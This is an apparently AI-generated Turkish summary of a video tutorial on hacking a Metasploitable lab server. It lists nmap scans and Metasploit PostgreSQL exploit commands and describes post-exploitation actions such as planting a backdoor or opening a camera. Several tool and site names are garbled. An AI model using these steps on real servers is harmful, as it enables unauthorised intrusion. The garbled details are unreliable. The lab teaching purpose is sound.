Yapay zekadan makale özeti
- Kısa
- Ayrıntılı
- Bu video, Ferhat adlı bir eğitimcinin sunduğu siber güvenlik eğitim içeriğidir. Ferhat, izleyicilere bir sunucunun nasıl hacklenebileceğini adım adım göstermektedir.
- Videoda Metasploitable adlı sızma makinesi kullanılarak bir sunucunun nasıl hacklenebileceği anlatılmaktadır. İçerikte Nmap ve Mmap gibi sızma araçlarının kullanımı, açık portların tespiti, exploit dosyalarının bulunması ve MSF konsol aracılığıyla sunucuya giriş yapılması detaylı olarak gösterilmektedir. Ayrıca, sızmış durumda olan sunucudaki makinelere erişim, upload ve download işlemleri, kamera açma gibi çeşitli eylemler de açıklanmaktadır.
- Ferhat, bu tür işlemlerin yasal olmadığını ve sadece siber güvenlik firmaları tarafından yapılması gerektiğini özellikle vurgulamaktadır. Video, "materpreter expo" içinde olduklarını belirterek sonlanmaktadır.
- 00:02Sunucu Hackleme Giriş
- Video, bir sunucunun nasıl hacklenebileceği konusunu işleyecek.
- Metasploitable adlı sızma testi aracı kullanılacak, bu araç başlı başına bir sunucu olarak çalışır.
- Hacker'ların genellikle sunucularda veritabanına erişim sağlamak veya backdoor koymak gibi hedefler vardır.
- 01:40Metasploitable IP'sini Öğrenme
- Nmap kullanarak Metasploitable'ın IP'sini öğrenmek için "nmap discover" komutu kullanılacak.
- "nmap discover 10.0.0.0/24" komutu ile aynı ağdaki tüm IP'ler taranır.
- Tarama sonucunda Metasploitable'ın IP'si (10.0.0.50) bulunur.
- 02:52Açıkları Tarama
- "nmap -A -T5 10.0.0.50" komutu ile Metasploitable'ın açıkları taranır.
- Tarama sırasında yasal uyarı verilir: Herhangi bir sunucuya izinsiz erişim yasal değildir.
- Tarama sonucunda Post-cre SQL ve MySQL portları açıktır.
- 05:36Açığı Kullanma
- Post-cre SQL'de bir versiyon açığı tespit edilir.
- Ripp7.com gibi açık veritabanlarından exploit bilgileri alınır.
- Metasploit konsolu kullanılarak exploit çalıştırılır.
- 07:10Metasploit Kullanımı
- Metasploit konsolu açılarak "use exploit/linux/postgresql/postgres_sql_exec" komutu ile exploit seçilir.
- "set target 1" komutu ile hedef sistem belirlenir.
- "set rhost 10.0.0.50" ve "set lhost 10.0.0.5" komutlarıyla hedef ve yerel IP adresleri ayarlanır.
- 09:22Sunucuya Giriş
- "exploit" komutu ile sunucuya giriş yapılır.
- İlk girişte hata alındıktan sonra, hedef sistem olarak "x86" seçildiğinde bağlantı başarıyla kurulur.
- 10:51Sunucuya Sızma Sonrası İşlemler
- Sunucuya sızınca upload, dinleme, kamera açma ve sunucuya bağlı makinalar üzerinde işlem yapma gibi çeşitli işlemler yapılabilir.
- Sunucudan dosya indirme (download) yapılabileceği gibi, backdoor (geri kapı) konulabilir.
- Sunucuya sızma işlemi tamamlanmış durumda ve sunucunun içinde bulunuluyor.
- 11:22Sızma Sürecindeki Hata
- Sızma sırasında ufak bir hata alınmış, nedeni olarak Linux ile çalışırken sıfırla çalışılması gerektiği belirtiliyor.
- Konuşmacı, dün akşam oturum açtığı için hata aldığını açıklıyor.
- Materpreter expo ortamında olduklarını belirterek videoyu sonlandırıyor.